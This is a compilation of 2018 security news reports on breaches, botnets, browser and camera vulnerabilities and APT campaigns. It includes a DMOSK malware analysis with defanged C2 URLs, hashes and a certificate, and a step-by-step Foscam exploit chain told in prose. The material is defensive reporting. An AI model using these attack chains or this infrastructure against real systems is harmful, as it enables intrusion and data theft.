Besides introducing new features and improvements of macOS 10.14 Mojave—like Dark Mode, Group FaceTime, Dynamic Desktop, and Finder—at WWDC, Apple also revealed a bunch of new security and privacy features coming with the next major macOS update.
Apple CEO Tim Cook said the new features included in Mojave are "inspired by pro users, but designed for everyone," helping you protect from various security threats.
Here's a list of all macOS Mojave security and privacy features:
Safari's Enhanced "Intelligent Tracking Prevention"
It's no longer shocking that your online privacy is being invaded, and everything you search online is being tracked—thanks to third-party trackers present on the Internet in the form of social media like and sharing buttons that marketers and data brokers use to monitor web users as they browse.


But not anymore. With macOS Mojave, Safari has updated its "Intelligent Tracking Prevention"—a feature that limits the tracking ability of website using various ad-tracking and device fingerprinting techniques.
The all-new enhanced Intelligent Tracking Prevention will now automatically block all third-party trackers, including social media "Like" or "Share" buttons, as well as comment widgets from tracking users without their permission.
Safari will also help in defeating the "device fingerprinting" approach by exposing only generic configuration information of users' device and default fonts.
End-to-End Encrypted Group FaceTime (Up to 32 People)

That's really a huge security improvement, as at WWDC 2018, Apple has introduced group FaceTime feature that lets groups of 32 or fewer people do video calls at the same time, which have end-to-end encryption just like the already existing one-to-one audio and video calls and group audio calls.
End-to-encryption for group calls with the Facetime app means that there's no way for Apple or anyone to decrypt the data when it's in transit between devices.
macOS Mojave Will Alert When Your Camera & Mic Are Accessed
As we reported several times in past few years, cybercriminals have now been spreading new malware for macOS that targets built-in webcam and microphone to spy on users without detection.


To address this threat, macOS Mojave adds a new feature that monitors access to your macOS webcam/microphone and alerts you with new permission dialogues whenever an app tries to access the camera or microphone.
This new protection has primarily been designed to prevent malicious software from silently turning on these device features in order to spy on its users.
Excessive Data Access Request User Permissions
macOS Mojave also adds similar permission requirements for apps to access personal data like mail database, message history, file system and backups.
By default, the macOS Mojave will also protect your location information, contacts, photos, Safari data, mail database, message history, iTunes device backups, calendar, reminders, time machine backups, cookies, and more.
Secure (and Convenient) Password Management
We have long warned users to deploy a good password practice by keeping their passwords strong and unique for every website or service. Now, Apple has made it easier in macOS 10.14 Mojave and iOS 12.
While Safari in macOS has provided password suggestions for years when users are asked to create a login at a site, Apple has improved this feature in a way that Safari now automatically generates strong passwords, enters them into the web browser, and stores them in the iCloud keychain when users create new online accounts.
Previously, third-party password manager apps have done that much of tasks, and now Apple is integrating such functionalities directly into the next major versions of both macOS and iOS.


The company also announced a new feature that even flags reused passwords so that users can change them, a new interface that autofills one-time passwords provided by authentication apps, and a mechanism that shares passwords across all of a user's nearby devices, including iOS devices, Macs, and Apple TVs.
macOS Mojave Moves Software Updates from App Store to System Preferences
With the new macOS Mojave, Apple has also redesigned its Mac App Store a little bit and moved the system update mechanism to the System Preferences from the Mac App Store.
Apple has reintroduced "Software Update" option in the System Preferences windows, allowing users to update their operating system and native software without opening the App Store.
Moreover, Apple has also confirmed that Mojave will be its last version of macOS to support legacy 32-bit apps.
Similar High Sierra, users will be shown a dialog box when opening 32-bit apps in macOS 10.14 Mojave (beta1) with a message telling them that "This app will not work with future versions of macOS."


MyHeritage Says Over 92 Million User Accounts Have Been Compromised
8.6.2018 thehackernews Incindent

MyHeritage, the Israel-based DNA testing service designed to investigate family history, has disclosed that the company website was breached last year by unknown attackers, who stole login credentials of its more than 92 million customers.
The company learned about the breach on June 4, 2018, after an unnamed security researcher discovered a database file named "myheritage" on a private server located outside of the company, and shared it with MyHeritage team.


After analyzing the file, the company found that the database, which included the email addresses and hashed passwords of nearly 92.3 million users, are of those customers who signed up for the MyHeritage website before October 27, 2017.
While the MyHeritage security team is still investigating the data breach to identify any potential exploitation of its system, the company confirmed that no other data such as credit card details and family trees, genetic data were ever breached and are stored on a separate system.
"Credit card information is not stored on MyHeritage to begin with, but only on trusted third-party billing providers (e.g., BlueSnap, PayPal) utilized by MyHeritage," MyHeritage wrote in a blog post published today.
"Other types of sensitive data such as family trees and DNA data are stored by MyHeritage on segregated systems, separate from those that store the email addresses, and they include added layers of security. We have no reason to believe those systems have been compromised."
MyHeritage also confirmed that there was no evidence of account compromise.


The company also notes that it does not store its customer passwords in plaintext; instead, the affected website uses a hashing algorithm with a unique salt to protect users' passwords, making them more resilient to cracking.
Therefore, your stolen passwords are probably safe, but the company still advised all of its users to change their passwords and keep a stronger and unique one, just to be on the safer side.
MyHeritage said it had hired an independent cybersecurity firm to conduct a forensic investigation of the data breach. The company also said it is adding two-factor authentication feature as an option for users.


Destructive and MiTM Capabilities of VPNFilter Malware Revealed
8.6.2018 thehackernews 
Virus

It turns out that the threat of the massive VPNFilter botnet malware that was discovered late last month is beyond what we initially thought.
Security researchers from Cisco's Talos cyber intelligence have today uncovered more details about VPNFilter malware, an advanced piece of IoT botnet malware that infected more than 500,000 routers in at least 54 countries, allowing attackers to spy on users, as well as conduct destructive cyber operations.
Initially, it was believed that the malware targets routers and network-attached storage from Linksys, MikroTik, NETGEAR, and TP-Link, but a more in-depth analysis conducted by researchers reveals that the VPNFilter also hacks devices manufactured by ASUS, D-Link, Huawei, Ubiquiti, QNAP, UPVEL, and ZTE.


"First, we have determined that are being targeted by this actor, including some from vendors that are new to the target list. These new vendors are. New devices were also discovered from Linksys, MikroTik, Netgear, and TP-Lin," the researchers say.
To hijack devices manufactured by above listed affected vendors, the malware simply relies on publicly-known vulnerabilities or use default credentials, instead of exploiting zero-day vulnerabilities.
VPNFilter 'ssler' — Man-in-the-Middle Attack Module

Besides this, the researchers primarily shared technical details on a new stage 3 module, named "ssler," which is an advanced network packet sniffer that, if installed, allows hackers to intercept network traffic passing through an infected router and deliver malicious payloads using man-in-the-middle attacks.
"Ssler module provides data exfiltration and JavaScript injection capabilities by intercepting all traffic passing through the device destined for port 80," the researchers say.
This 3rd-stage module also makes the malware capable of maintaining a persistent presence on an infected device, even after a reboot.
The ssler module has been designed to deliver custom malicious payloads for specific devices connected to the infected network using a parameter list, which defines the module's behavior and which websites should be targeted.
These parameters include settings to define the location of a folder on the device where stolen data should be stored, the source and destination IP address for creating iptable rules, as well as the targeted URL of the JavaScript injection.


To setup packet sniffing for all outgoing web requests on port 80, the module configures the device's iptables immediately after its installation to redirect all network traffic destined for port 80 to its local service listening on port 8888.
"To ensure that these rules do not get removed, ssler deletes them and then adds them back approximately every four minutes," the researchers explain.
To target HTTPS requests, the ssler module also performs SSLStrip attack, i.e., it downgrades HTTPS connections to HTTP, forcing victim web browsers into communicating over plaintext HTTP.
VPNFilter 'dstr' — Device Destruction Module
As briefed in our previous article, VPNFilter also has a destructive capability (dstr module) that can be used to render an infected device unusable by deleting files necessary for normal device operation.
The malware triggers a killswitch for routers, where it first deliberately kills itself, before deleting the rest of the files on the system [named vpnfilter, security, and tor], possibly in an attempt to hide its presence during the forensic analysis.
This capability can be triggered on individual victim machines or en masse, potentially cutting off internet access for hundreds of thousands of victims worldwide.
Simply Rebooting Your Router is Not Enough
Despite the FBI seizure of a key command and control server right after the discovery of VPNFilter, the botnet still remains active, due to its versatile, multi-stage design.
Stage 1 of the malware can survive a reboot, gaining a persistent foothold on the infected device and enabling the deployment of stages 2 and 3 malware. So, each time an infected device is restarted, stages 2 and 3 are re-installed on the device.


This means, even after the FBI seized the key C&C server of VPNFilter, hundreds of thousands of devices already infected with the malware, likely remain infected with stage 1, which later installs stages 2 and 3.
Therefore, rebooting alone is not enough to completely remove the VPNFilter malware from infected devices, and owners of consumer-grade routers, switches, and network-attached storage devices need to take additional measures, which vary from model to model. For this, router owners are advised to contact their manufacturer.
For some devices, resetting routers to factory default could remove the potentially destructive malware, along with removing stage 1, while some devices can be cleaned up with a simple reboot, followed by updating the device firmware.
And as I said earlier, mark these words again: if your router cannot be updated, throw it away and buy a new one. Your security and privacy is more than worth a router's price.


Update Google Chrome Immediately to Patch a High Severity Vulnerability
8.6.2018 thehackernews 
Vulnerebility

You must update your Google Chrome now.
Security researcher Micha³ Bentkowski discovered and reported a high severity vulnerability in Google Chrome in late May, affecting the web browsing software for all major operating systems including Windows, Mac, and Linux.
Without revealing any technical detail about the vulnerability, the Chrome security team described the issue as incorrect handling of CSP header (CVE-2018-6148) in a blog post published today.
"Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed," the Chrome security team notes.
Content Security Policy (CSP) header allows website administrators to add an extra layer of security on a given web page by allowing them to control resources the browser is allowed to load.


Mishandling of CSP headers by your web browser could re-enable attackers to perform cross-site scripting, clickjacking and other types of code injection attacks on any targeted web pages.
The patch for the vulnerability has already been rolled out to its users in a stable Chrome update 67.0.3396.79 for Windows, Mac, and Linux operating system, which users may have already receive or will receive over the coming days/weeks.
So, make sure your system is running the updated version of Chrome web browser. We'll update the article, as soon as Google releases further update.
Firefox has also released its new version of the Firefox web browser, version 60.0.2, which includes security and bug fixes. So, users of the stable version of Firefox are also recommended to update their browser.


Prowli Malware Targeting Servers, Routers, and IoT Devices
8.6.2018 thehackernews  IoT 
Virus

After the discovery of massive VPNFilter malware botnet, security researchers have now uncovered another giant botnet that has already compromised more than 40,000 servers, modems and internet-connected devices belonging to a wide number of organizations across the world.
Dubbed Operation Prowli, the campaign has been spreading malware and injecting malicious code to take over servers and websites around the world using various attack techniques including use of exploits, password brute-forcing and abusing weak configurations.
Discovered by researchers at the GuardiCore security team, Operation Prowli has already hit more than 40,000 victim machines from over 9,000 businesses in various domains, including finance, education and government organisations.


Here's the list devices and services infected by the Prowli malware:
Drupal and WordPress CMS servers hosting popular websites
Joomla! servers running the K2 extension
Backup servers running HP Data Protector software
DSL modems
Servers with an open SSH port
PhpMyAdmin installations
NFS boxes
Servers with exposed SMB ports
Vulnerable Internet-of-Thing (IoT) devices
All the above targets were infected using either a known vulnerability or credential guessing.
Prowli Malware Injects Cryptocurrency Miner

Since the attackers behind the Prowli attack are abusing the infected devices and websites to mine cryptocurrency or run a script that redirects them to malicious websites, researchers believe they are more focused on making money rather than ideology or espionage.
According to GuardiCore researchers, the compromised devices were found infected with a Monero (XMR) cryptocurrency miner and the "r2r2" worm—a malware written in Golang that executes SSH brute-force attacks from the infected devices, allowing the Prowli malware to take over new devices.


In simple words, "r2r2 randomly generates IP address blocks and iteratively tries to brute force SSH logins with a user and password dictionary. Once it breaks in, it runs a series of commands on the victim," the researchers explain.
These commands are responsible for downloading multiple copies of the worm for different CPU architectures, a cryptocurrency miner and a configuration file from a remote hard-coded server.
Attackers Also Tricks Users Into Installing Malicious Extensions
Besides cryptocurrency miner, attackers are also using a well known open source webshell called "WSO Web Shell" to modify the compromised servers, eventually allowing attackers to redirect visitors of websites to fake sites distributing malicious browser extensions.
The GuardiCore team traced the campaign across several networks around the world and found the Prowli campaign associated with different industries.
"Over a period of 3 weeks, we captured dozens of such attacks per day coming from over 180 IPs from a variety of countries and organizations," the researchers said. "These attacks led us to investigate the attackers' infrastructure and discover a wide-ranging operation attacking multiple services."
How to Protect Your Devices From Prowli-like Malware Attacks
Since the attackers are using a mix of known vulnerabilities and credential guessing to compromise devices, users should make sure their systems are patched and up to date and always use strong passwords for their devices.
Moreover, users should also consider locking down systems and segmenting vulnerable or hard to secure systems, in order to separate them from the rest of their network.
Late last month, a massive botnet, dubbed VPNFilter, was found infecting half a million routers and storage devices from a wide range of manufacturers in 54 countries with a malware that has capabilities to conduct destructive cyber operations, surveillance and man-in-the-middle attacks.


DMOSK Malware Targeting Italian Companies
8.6.2018 securityaffairs
Virus

The security expert and malware researcher Marco Ramilli published a detailed analysis on a new strain of malware dubbed DMOSK that targets Italian firms,
Today I’d like to share another interesting analysis made by my colleagues and I. It would be a nice and interesting analysis since it targeted many Italian and European companies. Fortunately, the attacker forgot the LOG.TXT freely available on the dropping URL letting us know the IP addresses who clicked on the first stage analyzed stage (yes, we know the companies who might be infected). Despite what we did with TaxOlolo we will not disclose the victims IP addresses and so the companies which might be infected. National CERTs have been involved and they’ve got alerted. Since we believe the threat could radically increase its magnitude in the following hours, we decided to write up this quick dirty analysis focusing on speed rather than on details. So please forgive some quick and undocumented steps.
Everything started with an email (how about that ?!). The eMail we’ve got had the following body.

Attack Path
A simple link to a drive ( drive.carlsongracieanaheim.com ) is beginning our first stage of infection. An eMail address is given as one parameter to the doc.php script which would record the IP address and the “calling” email address belonging to the victim. The script forces the browser to download a .zip file which uncompressed presents to the victim a JSE file called: scan.jse. The file is hard obfuscated. It was quite difficult to be able to decode the following stage of infection since the JavaScript was obfuscated through, at least, 3 different techniques. The following image shows the Obfuscated sample.

Second Stage: Obfuscated JSE
Unfortunately the second stage is not the final one. Indeed once de-obfuscated it we figured out that it was dropping and executing another file having the .SCR mimetype. From this stage it’s interesting to observe that only one dropping URL was called. It’s a strange behaviour, usually the attackers use multiple dropping URLs in order to get more chances to infect the victims. The found URL was the following one:
“url”: “https://drive.carlsongracieanaheim.com/x/gate.php”
The JSE file dropped the Third Stage into \User\User\AppData\Local\Temp\38781520.scr having the following hash: 77ad9ce32628d213eacf56faebd9b7f53e6e33a1a313b11814265216ca2c4745 which has been previously analysed by 68 AV but only 9 of them recognised as malicious generic file. The following image shows the VirusTotal analysis.

Third Stage: Executable SCR file

Unfortunately, we are still not at the end of the infection Stage. The Third stage drops and executes another payload. It does not download and execute from a different dropping website but it drops from a special and crafted memory address (fixed from .txt:0x400000). The following image shows the execution of the Fourth Stage payload directly from the victim’s memory

Fourth Stage: Dropped PE File
Following the analysis it has been possible to figure out that the final payload is something very close to ursnif which grabs victims email information and credentials. The following image shows the temporary file built before sending out information to Command and Controls servers.

Temporary File Before Sending data to Command and Control
Like any other ursnif the malware tries to reach a command and control network located both on the clear net and on the TOR network. The following section will expose the recorded IoCs.

An interesting approach that was adopted by attackers is the blacklisting. We observed at least 3 blacklists. The first one was based on victims IP. We guess (but we have not evidence on that) that the attacker would filtering responses based on Country in order to make possible a country targeted attack by blacklisting not-targeted countries. The following image shows the used temporary file to store Victim IP. The attacker could use this information in order to respond or not to a specific malware request.

Temporary File Storing IP Victim IP Address

A second black list that we found was on the dropping URL web site which was trained to do not drop files to specific IP addresses. The main reasons found to deny the dropping payload were three:
geo (Out of geographical scope). The threat is mainly focused to hit italy.
asn (internet service providers and/or cloud providers). The threat is mainly focused on clients and not on servers, so it would have no sense to give payload to cloud providers.
MIT. THe attacker does not want the dropping payload ends up to MIT folks, this is quite funny, isn’t it ?

A small section of blacklisting drop payload
The blacklists are an interesting approach to reduce the chance to be analyzed, in fact, the blacklisted IPs belong to pretty known CyberSecurity Companies (Yoroi is included) which often use specific cloud providers to run emulations and/or sandboxes.
Personal note: This is a reverse targeting attack, where the attacker wants to attack an entire set of victims but not some specific ones, so it introduces a blocking delivery of payload technique. End personal note.
Now we know how the attack works, so lets try to investigate a little bit what the attacker messed out. For example lets try to analyse the content of the Dropping URL. Quite fun to figure out the attacker let freely available his private key ! I will not disclose it …. let’s say… for respect to the attacker (? really ?)

Attacker Private Key !
While the used public certificate is the following one:

Attacker Certificate
By decoding the fake certificate the analyst would take the following information, of course, none of these information would be valuable, but make a nice shake of analysis.

Common Name: test.dmosk.local
Organization: Global Security
Organization Unit: IT Department
Locality: SPb
State: SPb
Country: RU
Valid From: June 5, 2018
Valid To: June 5, 2022
Issuer: Global Security
Serial Number: 12542837396936657430 (0xae111c285fe50a16

Maybe the most “original string”, by the meaning of being written without thinking too much from the attacker, on the entire malware analysis would be the string ‘dmosk’ (in the decoded certificate), from here the Malware name.
As today we observed: 6617 email addresses that potentially could be compromised since they clicked on the First stage (evidence on dropping URL). We have evidence that many organisations have been hit by this malware able to bypass most of the known security protections since it was behind CloudFlare and with not a specific bad reputation. We decided to not disclose the “probably infected” companies. Nation Wide CERTs have been alerted (June 7 2018) and together we will contact the “probably infected” companies to help them to mitigate the threat.
Please update your rules, signature and whatever you have to block the infection.
PS: the threat is quite a bit bigger than what I described, there are several additional components including APK (Android Malware), base ciphers, multi-stage obfuscators and a complete list of “probably infected” users, but again, we decided to encourage the notification speed rather than analysis details.
Hope you might find it helpful.
IoC:

Dropurl:
https:// drive[.carlsongracieanaheim[.com/doc.php
https:// drive[.carlsongracieanaheim[.com/doc1.php
https:// drive[.carlsongracieanaheim[.com/x/gate.php
https:// drive[.carlsongracieanaheim[.com/1/gate.php
C2 (tor):
https:// 4fsq3wnmms6xqybt[.onion/wpapi
https:// em2eddryi6ptkcnh[.onion/wpapi
https:// nap7zb4gtnzwmxsv[.onion/wpapi
https:// t7yz3cihrrzalznq[.onion/wpapi
C2:
https:// loop.evama.[at/wpapi
https:// torafy[.cn/wpapi
https:// u55.evama[.at/wpapi
https:// yraco[.cn/wpapi
https:// inc.robatop.[at/wpapi
https:// poi.robatop.[at/wpapi
https:// arh.mobipot.[at/wpapi
https:// bbb.mobipot.[at/wpapi
https:// takhak.[at/wpapi
https:// kerions.[at/wpapi
https:// j11.evama[.at/wpapi
https:// clocktop[.at/wpapi
https:// harent.[cn/wpapi
Hash:
067b39632f093821852889b1e4bb8b2a48afd94d1e348702a608a70bb7b00e54 zip
77ad9ce32628d213eacf56faebd9b7f53e6e33a1a313b11814265216ca2c4745 jse
8d3d37c9139641e817bcf0fad8550d869b9f68bc689dbbf4b4d3eb2aaa3cf361 scr
1fdc0b08ad6afe61bbc2f054b205b2aab8416c48d87f2dcebb2073a8d92caf8d exe
afd98dde72881d6716270eb13b3fdad2d2863db110fc2b314424b88d85cd8e79 exe
Cert:
-----BEGIN CERTIFICATE-----
MIID3zCCAsegAwIBAgIJAK4RHChf5QoWMA0GCSqGSIb3DQEBCwUAMIGFMQswCQYD
VQQGEwJSVTEMMAoGA1UECAwDU1BiMQwwCgYDVQQHDANTUGIxGDAWBgNVBAoMD0ds
b2JhbCBTZWN1cml0eTEWMBQGA1UECwwNSVQgRGVwYXJ0bWVudDEZMBcGA1UEAwwQ
dGVzdC5kbW9zay5sb2NhbDENMAsGA1UEAwwEdGVzdDAeFw0xODA2MDUxNTIyMjBa
Fw0yMjA2MDUxNTIyMjBaMIGFMQswCQYDVQQGEwJSVTEMMAoGA1UECAwDU1BiMQww
CgYDVQQHDANTUGIxGDAWBgNVBAoMD0dsb2JhbCBTZWN1cml0eTEWMBQGA1UECwwN
SVQgRGVwYXJ0bWVudDEZMBcGA1UEAwwQdGVzdC5kbW9zay5sb2NhbDENMAsGA1UE
AwwEdGVzdDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMua+rsContr
RIvQHX/M2qE4H30dIaLpYUqKll3GaZl8nkSxDAtyytfkMxiMeyn6tg2wy1M8RgGN
7dqtQwUJHfRdiaebmliKMPJHBn3SOhTd/caf7v552C85AQuOKZMWgaJ/3gQodmgI
Tr7p8q7g2OWg4nE0nGXXasFZYVEU3S81Z0wxNriRD9geNfkamv8fi0hm8HzDnLdi
bjvbTAsqTdegkkk/41ssXttckQRhRpgIzqRJ+sappdu4FzTuxOVA4jSRgZokD1l2
QFr4YTEJSUz4QHDGbow3nLvqTEHpvG90tgr+AHcR31otPiI1wm6bTj6IdicFENfC
4+5aIkvm72cCAwEAAaNQME4wHQYDVR0OBBYEFBIc9X32dzRzR9T1pmrmdZtshmJ9
MB8GA1UdIwQYMBaAFBIc9X32dzRzR9T1pmrmdZtshmJ9MAwGA1UdEwQFMAMBAf8w
DQYJKoZIhvcNAQELBQADggEBAE8AE11sWLICXcBO64iYByM96ZSWWN1JYGRaFWJ8
l8J1BiQNxh5N31X1HBs/sc87CPuqBB8CKxukoYU1T54HZQYmb3NHdc3JLFH2ah/o
028TSCXy16uvGGcxMhNcoZUCjWQHJzbXbVvPjkKjkJ1RR8DV1hRMcYLfO6LtSjAd
h7VnPVBNffGC/n9eTQjvwOR+dRN1IFLzwmpnwqVcxxjJM3+2OExfWBzKQ08/7MK/
xM8X8cmAb11Oyg7RXnE7X9Cfygy/Rz2fDGv4K7N8YDdL5osnyrN5fG8L2GG+srJ2
wdFYILlV+eLyfhwr6Oor5Z4zPgvcLLKbpHxQBvdkEdqX5F0=


Russia-linked Sofacy APT group adopts new tactics and tools in last campaign
8.6.2018 securityaffairs APT

Sofacy APT group (APT28, Pawn Storm, Fancy Bear, Sednit, Tsar Team, and Strontium) continues to operate and thanks to rapid and continuously changes of tactics the hackers are able to remain under the radar.
According to experts from Palo Alto Networks, the hackers also used new tools in recent attacks, recently the APT group has shifted focus in their interest, from NATO member countries and Ukraine to towards the Middle East and Central Asia.

The researchers observed several attacks leveraging the SPLM and the Zebrocy tool between the second and fourth quarters of 2017 against organizations in Asia. The list of targeted countries included China, Mongolia, South Korea and Malaysia.

Back to the present, the Sofacy APT group is using a new version of the Zebrocy backdoor written in a C++, attackers adopted the Dynamic Data Exchange (DDE) attack technique to deliver malware.

The DDE attack technique was exploited to deliver payloads such as the Zebrocy backdoor and the open-source penetration testing toolkit Koadic.

This is the first time that the Russian APT uses the Koadic tool.

“Following up our most recent Sofacy research in February and March of 2018, we have found a new campaign that uses a lesser known tool widely attributed to the Sofacy group called Zebrocy. Zebrocy is delivered primarily via phishing attacks that contain malicious Microsoft Office documents with macros as well as simple executable file attachments.” reads the analysis published by Palo Alto Networks.

“This third campaign is consistent with two previously reported attack campaigns in terms of targeting: the targets were government organizations dealing with foreign affairs. In this case however the targets were in different geopolitical regions.”

Palo Alto noticed a change in the tactics used by the hackers, instead of targeting a handful of employees within an organization, they sent phishing messages to “an exponentially larger number of individuals” within the same organization.

Attackers obtained the list of individuals’ emails with simple queries to search engines, this method is also a novelty for the Sofacy APT group.

The researchers linked this campaign to previous attacks, in February Palo Alto Networks reported the Sofacy APT group was hiding infrastructure using random registrant and service provider information in each attack.

“In our February report, we discovered the Sofacy group using Microsoft Office documents with malicious macros to deliver the SofacyCarberp payload to multiple government entities.” continues Palo Alto.

“In that report, we documented our observation that the Sofacy group appeared to use conventional obfuscation techniques to mask their infrastructure attribution by using random registrant and service provider information for each of their attacks. In particular, we noted that the Sofacy group deployed a webpage on each of the domains.”

Sofacy APT

The investigation on this campaign allowed the experts to discover another campaign leveraging the DealersChoice exploit kit and a domain serving the Zebrocy AutoIT downloader.

The version of Zebrocy downloader delivered by this domain is the new one written in C++, the downloader was used to spread the Delphi backdoor hosted at IP address 185.25.50[.]93.

The experts discovered the following hard-coded user agent being used by many samples of Zebrocy targeting the foreign affairs ministry of a large Central Asian nation:

Mozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/1.6.3.8 (WinHTTP/5.1) like Gecko
The experts found two weaponized Office documents implementing the DDE attack technique, the malicious files were used in attacks against a North American government organization dealing with foreign affairs.

Further details, including IoCs are reported in the analysis published by Palo Alto Networks.


Facebook confirms privacy settings glitch in a new feature exposed private posts of 14 Million users

8.6.2018 securityaffairs Social

Facebook admitted that a bug affecting its platform caused the change of the settings of some 14 million users, potentially exposing their private posts to the public.
This is the worst period in the history of the social network giant that was involved in the Cambridge Analytica privacy scandal that affected at least 87 Million users.

“We recently found a bug that automatically suggested posting publicly when some people were creating their Facebook posts. We have fixed this issue and starting today we are letting everyone affected know and asking them to review any posts they made during that time,” said Erin Egan, Facebook’s chief privacy officer.

“To be clear, this bug did not impact anything people had posted before—and they could still choose their audience just as they always have. We’d like to apologize for this mistake.”

According to Facebook, the glitch affected some of its users that published posts between May 18 and May 27 because in that period of time it was implementing a new feature for the sharing of data such as images and videos.

Evidently, something went wrong, and the overall private messages were shared as public by defaults.

The social network giant confirmed to have corrected the bug on May 22, but it was unable to change the visibility of all the posts.

The company is now notifying affected users apologizing for the technical issue.

This is the last embarrassing case that involved Facebook in the last weeks, in April, researchers from Princeton researchers reported that the Facebook’s authentication feature “Login With Facebook” can be exploited to collect user information that was supposed to be private.

Early this week, Facebook confirmed that its APIs granted access to the data belonging to its users to more than 60 device makers, including Amazon, Apple, Microsoft, Blackberry, and Samsung so that they could implement Facebook messaging functions.

The Chinese vendor Huawei was one of the device makers authorized to use the API, the firm, in May the Pentagon ordered retail outlets on US military bases to stop selling Huawei and ZTE products due to unacceptable security risk they pose.

Facebook highlighted that the agreement was signed ten years and that its operated to prevent any abuse of the API.


Multiple models of IP-based cameras from Chinese firm Foscam could be easily hacked. Update the firmware now!
8.6.2018 securityaffairs
Vulnerebility

A security vulnerability was discovered in webcams, IP surveillance cameras and also baby monitors manufactured by the Chinese firm Foscam.
The Chinese firm Foscam has released firmware updates to address three vulnerabilities in multiple models of IP-based cameras that could be exploited to take control of vulnerable cameras exposed online.

The following flaws were reported by the experts from IoT security firm VDOO:

CVE-2018-6830
CVE-2018-6831
CVE-2018-6832
chaining the three flaw the hackers could completely take over the Foscam cameras.

The experts from VDOO has published a technical analysis of the three vulnerabilities, including a proof-of-concept code.

“One of the vendors for which we found vulnerable devices was Foscam, when our team discovered a critical chain of vulnerabilities in Foscam security cameras. Combining the discovered vulnerabilities, if an adversary successfully obtains the address of the camera, he can gain root access to the affected cameras remotely (over LAN or the internet).” reads the analysis published by VDOO.

“VDOO has responsibly disclosed these vulnerabilities (CVE-2018-6830, CVE-2018-6831 and CVE-2018-6832) and engaged with Foscam security team to solve the matter.”

Below the attack scenario described by VDOO on a network-accessible camera:

The attack scenario on a network-accessible camera is as follows:

Step 1: An adversary must first obtain the camera’s IP address or DNS name. It can be achieved in several ways, including:
If the camera and the network are configured by the user such that the camera has direct interface to the internet, its address might be revealed by some internet scanners.
If the adversary gained unauthorized (remote or local) access to a network to which the camera is connected, he might be able to find the local address of the camera.
If dynamic DNS is enabled by the user, the adversary might find a way to resolve the device name
Step 2: The adversary then uses CVE-2018-6830, an arbitrary file deletion vulnerability, to delete certain critical files that will result in authentication bypass when the webService process reloads.
Step 3: The adversary crashes the webService process by exploiting CVE-2018-6832, a stack-based buffer overflow vulnerability in the webService process. After it crashes, the webService process is automatically restarted by the watchdog daemon, and during the process reload, the changes from step 2 take effect. The adversary is now able to gain administrative credentials.
Step 4: The adversary executes root commands by exploiting CVE-2018-6831. This is a shell command injection vulnerability that requires administrator credentials. Since the adversary gained administrator credentials in the previous stage, he can now use this vulnerability to execute commands as the root user for privilege escalation. Full details appear in the Technical Deep Dive below.
Foscam Internet-connected cameras

In June 2017, experts at F-Secure discovered tens of vulnerabilities in tens of thousands of Internet-connected cameras from China-based manufacturer Foscam, but at the time the Chinese firm ignored the report from the security firm.

The experts published a long list of affected Foscam device models and firmware versions, users urge to update the firmware as soon as possible.

Likely many other camera models from other vendors could be affected by the vulnerabilities because Foscam also provides its products in white-label mode.


Teen Arrested for Hacking Minnesota Government Systems
7.6.2018 securityweek Crime

The United States Department of Justice this week announced the arrest of an individual charged with the hacking of servers owned by the State of Minnesota.

The suspect, Cameron Thomas Crowley, 19, who uses the online handle of Vigilance, made an initial appearance in court on Tuesday, before United States Magistrate Judge Becky R. Thorson in Saint Paul, Minnesota. He remains in federal custody pending his detention hearing.

In addition to announcing Crowley’s arrest, the Department of Justice revealed a five-count indictment that charges the individual with intentional access to a protected computer, intentional damage to a protected computer, and aggravated identity theft.

The indictment alleges that, between May 28, 2017 and June 17, 2017, Crowley intentionally accessed protected servers owned by the State of Minnesota and other entities, without authorization.

In June last year, Vigilance announced on Twitter the hacking of databases belonging to the Minnesota state government and the theft of over a thousand email addresses and corresponding passwords, all of which were dumped online.

The hacker said at the time the action was the result of a jury finding Jeronimo Yanez, a police officer from St. Anthony, Minnesota, not guilty of manslaughter after he shot and killed African-American Philando Castile during a seemingly routine traffic stop in the summer of 2016.

Castile, 32, was shot seven times when he tried to reach for his ID, after he told Yanez he had a gun and a license to carry it. Castile was in the car with his girlfriend and their 4-year-old daughter.

Crowley is also charged with transmitting programs, code, and commands to the compromised servers, causing damage that led to a loss to the State of Minnesota of more than $5,000.

Thus, the alleged hacker is charged with three counts of intentional access to a protected computer and one count of intentional damage to a protected computer. Additionally, the indictment charges Crowley with one count of aggravated identity theft.

The investigation into this case is conducted by the Federal Bureau of Investigation and the Minnesota Bureau of Criminal Apprehension.


92 Million User Credentials Exposed in MyHeritage Data Breach
7.6.2018 securityweek Incindent

[Updated] MyHeritage, a DNA and genealogy firm, announced Monday that the access credentials of 92 million users had been stolen. It only discovered the breach when a security researcher informed the company he had found a file named myheritage stored outside of MyHeritage.

The file contains, writes MyHeritage CISO Omer Deutsch in a statement, "the email addresses and hashed passwords of 92,283,889 users who had signed up to MyHeritage up to and including Oct 26, 2017 which is the date of the breach." He stresses that the passwords are stored as "a one-way hash of each password, in which the hash key differs for each customer" (possibly implying that each password is hashed with a unique salt).

Deutsch believes that only the credentials were stolen. "We have no reason to believe that any other MyHeritage systems were compromised." Furthermore, he adds, "we have not seen any activity indicating that any MyHeritage accounts had been compromised." Payment data, user DNA data and family trees have not been affected.

MyHeritage went public with commendable speed – on the same day it learnt of the breach. However, some aspects of the statement are concerning. For example, it immediately set up an incident response team to investigate the incident. Best practice would have such a team already established in anticipation of a breach.

The firm is expediting "work on the upcoming two-factor authentication feature that we will make available to all MyHeritage users soon." Best practice would have had MFA in place long ago. Furthermore, it will 'recommend' rather than require users to employ the MFA option. It also recommends users should change their passwords, when it should perhaps force a password reset on all users.

"It appears that MyHeritage hasn't taken the steps to automatically require users to change passwords, just that they recommend they do," comments Absolute Software's Global Security Strategist Richard Henderson. "That should be an immediate action for any breach of this type. We still don't know (and neither do they) how this information was stolen, or the motives for doing so... and the statement by MyHeritage that they believe no other data was taken, especially unique DNA information and genealogy information, is probably a little premature, until they can determine exactly what happened late last October."

The reassuring tone of the MyHeritage statement is also challenged by Anthony James, CMO of CipherCloud. "Don't believe for a second that a hashed password is safe," he says. "Hashed passwords are absolutely not safe if stolen – these hashed passwords are still highly vulnerable to a dictionary attack, where the attacker runs a hash function against the top 100,000 most popular passwords and computes the hash function against all of them. Then all they need do is compare these calculated values to the list stolen from MyHeritage. So, NO, a smart cyber-attacker could be working diligently, even now, to map the hashed values to real passwords and break the accounts."

